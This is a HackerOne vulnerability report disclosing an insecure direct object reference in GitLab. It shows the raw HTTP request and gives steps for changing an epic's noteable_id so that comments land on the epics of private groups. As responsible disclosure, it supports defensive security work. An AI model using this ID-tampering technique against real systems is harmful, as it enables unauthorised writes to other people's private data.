Add comments/Discussion on Epic of any Public/Private group on Gitlab(IDOR)

HackerOne report #434197 by vijay_kumar1110 on 2018-11-05:

Description: [add summary of the vulnerability] In Any public/Private group with the Gold Plan you can Access Epics. In the Epic you have option of Commenting and Creating a Discussion. With every new Epic there is a Epic_ID generated. Adding Comment/Discussion on Epic request is vulnerable to IDOR attack where changing the Epic_ID leads to Add Comments/Discussion to any Public or private Group Epic.

##Vulnerable Request :

POST /groups/[Group_name]/-/epics/1/notes HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/groups/vijaykumar007Publicgroup/-/epics/1
X-CSRF-Token: 
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 117
Connection: close
Cookie: [Cookies]

note%5Bnoteable_type%5D=epic&note%5Bnoteable_id%5D=[Epic_ID]&note%5Bnote%5D=movddvmo&merge_request_diff_head_sha=undefined

Vulnerable parameter : noteable_id -- > Epic_ID

Steps To Reproduce:

  1. From test1 user account create a new private group.(Victim group)
  2. Start the Gold free trial and Epic feature will open.
  3. Create a New Epic.(Ex: victim_epic , ID=1234)
  4. Now login from Test2 user account and try to access the victim group.
  5. You will not have access to this group.
  6. Now create a new group from test2 account and enable the Gold trial account.
  7. Now create a new Epic and In the Epic create a new Discussion.
  8. Intercept this request and it will look something like above mentioned request.
  9. Now change the Epic_ID in post parameter and send the request.
  10. Now you will notice the Discussion will be added in the Victim Epic. Same can be done with Public groups too.

Supporting Material/References:

Let me know if you require One.

Impact

Add comments/Discussion on Epic of any Public/Private group on Gitlab(IDOR)

Edited by Dennis Appelt